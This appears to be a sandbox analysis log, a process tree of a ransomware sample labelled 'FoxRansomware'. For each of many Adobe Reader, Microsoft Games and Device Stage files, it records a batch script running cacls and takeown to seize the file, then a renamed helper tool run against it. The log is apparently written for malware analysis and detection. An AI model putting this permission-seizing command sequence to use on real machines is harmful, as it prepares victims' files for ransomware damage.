    C:\Windows\SysWOW64\cmd.exe (PID 3164): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "UKRAINE.TXT" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4224): sOCkujKF.exe -accepteula "UKRAINE.TXT" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4220): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 1104): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 2108): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4280): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 4300): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ended_review_or_form.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4308): sOCkujKF.exe -accepteula "ended_review_or_form.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4292): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4332): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 4268): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4348): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 4388): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviewers.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4376): sOCkujKF.exe -accepteula "reviewers.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4408): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4428): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 4356): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4360): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 4468): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_lg.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4464): sOCkujKF.exe -accepteula "server_lg.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4500): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4352): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
    C:\Windows\SysWOW64\cacls.exe (PID 4532): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4572; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    C:\Windows\SysWOW64\cmd.exe (PID 4488): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4496): sOCkujKF.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4588): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4612): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
    C:\Windows\SysWOW64\cacls.exe (PID 4552): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4652): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    C:\Windows\SysWOW64\cmd.exe (PID 4684): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-Bold.otf" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4604): sOCkujKF.exe -accepteula "MinionPro-Bold.otf" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4692): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4608): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
    C:\Windows\SysWOW64\cacls.exe (PID 4720): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4752): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    C:\Windows\SysWOW64\cmd.exe (PID 4776): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zy______.pfm" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4788): sOCkujKF.exe -accepteula "zy______.pfm" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4800): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4804): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
    C:\Windows\SysWOW64\cacls.exe (PID 4708): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4724; Modifies file permissions): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    C:\Windows\SysWOW64\cmd.exe (PID 4868): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt.fca" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3492): sOCkujKF.exe -accepteula "brt.fca" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 920): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4728): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
    C:\Windows\SysWOW64\cacls.exe (PID 4924): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4928): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    C:\Windows\SysWOW64\cmd.exe (PID 4856): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eng.hyp" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4936): sOCkujKF.exe -accepteula "eng.hyp" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4952): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4900): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
    C:\Windows\SysWOW64\cacls.exe (PID 5024): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 5040): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    C:\Windows\SysWOW64\cmd.exe (PID 5012): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zdingbat.txt" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5032): sOCkujKF.exe -accepteula "zdingbat.txt" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5048): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4960): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
    C:\Windows\SysWOW64\cacls.exe (PID 2220): cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 3276): takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    C:\Windows\SysWOW64\cmd.exe (PID 1904): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "TURKISH.TXT" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5116): sOCkujKF.exe -accepteula "TURKISH.TXT" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5096): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4976): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
    C:\Windows\SysWOW64\cacls.exe (PID 864): cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 1488; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    C:\Windows\SysWOW64\cmd.exe (PID 2480): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "PurblePlaceMCE.png" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2032): sOCkujKF.exe -accepteula "PurblePlaceMCE.png" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5076): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3784): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
    C:\Windows\SysWOW64\cacls.exe (PID 2544): cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 2464; Suspicious use of AdjustPrivilegeToken): takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    C:\Windows\SysWOW64\cmd.exe (PID 3756): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SolitaireMCE.png" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3976): sOCkujKF.exe -accepteula "SolitaireMCE.png" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3108): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 3092): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:4068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵PID:3368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵PID:1976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵PID:3788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:3992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "FreeCellMCE.png" -nobanner3⤵PID:1884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "FreeCellMCE.png" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3172
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵PID:2636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:1536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "HeartsMCE.png" -nobanner3⤵PID:2836
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "HeartsMCE.png" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1132
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:1420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:3580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "watermark.png" -nobanner3⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "watermark.png" -nobanner4⤵PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3892
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:3672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3844
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:2324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:3936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:3912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "license.html" -nobanner3⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "license.html" -nobanner4⤵PID:3920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:4080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:2052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:2632
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:1308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:3472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3352
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:2732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:3900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:2176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eula.ini" -nobanner3⤵PID:2356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "eula.ini" -nobanner4⤵PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:3928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:4180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:2280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:2800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:2572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:2348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:3212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:4156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:3112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:3364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
PID:4140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:4116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:2120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:4136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:4144
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:3864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:2972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:2664
-
